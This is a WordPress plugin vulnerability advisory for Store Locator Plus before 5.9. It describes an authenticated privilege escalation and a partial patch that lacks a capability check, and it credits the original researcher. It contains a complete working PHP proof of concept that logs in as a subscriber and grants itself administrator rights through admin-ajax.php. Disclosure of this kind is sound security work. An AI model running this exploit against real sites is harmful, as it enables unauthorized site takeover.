WordPress Plugin Vulnerabilities
Store Locator Plus < 5.9 - Authenticated Privilege Escalation
Description
There is functionality in the plugin that made it possible for authenticated users to update their user meta data to become an administrator on any site using the plugin.
**Partially unpatched because they added CSRF protection that technically blocks low-level users from using the endpoint, however, no capability check was added.
Proof of Concept
<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'log' => $wp_user,
'pwd' => $wp_pass,
'rememberme' => 'forever',
'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);
// Escalate
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'action' => 'slp_change_option',
'formdata[option_name]' => 'user_meta[wp_capabilities]',
'formdata[option_value][administrator]' => '1'
]);
$content = curl_exec($ch);
echo $content;
?>
Affects Plugins
Fixed in 5.9 References
Classification
Type
PRIVESC
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-26 (about 3 years ago)
Added
2021-04-27 (about 3 years ago)
Last Updated
2022-09-06 (about 1 years ago)
WPScan 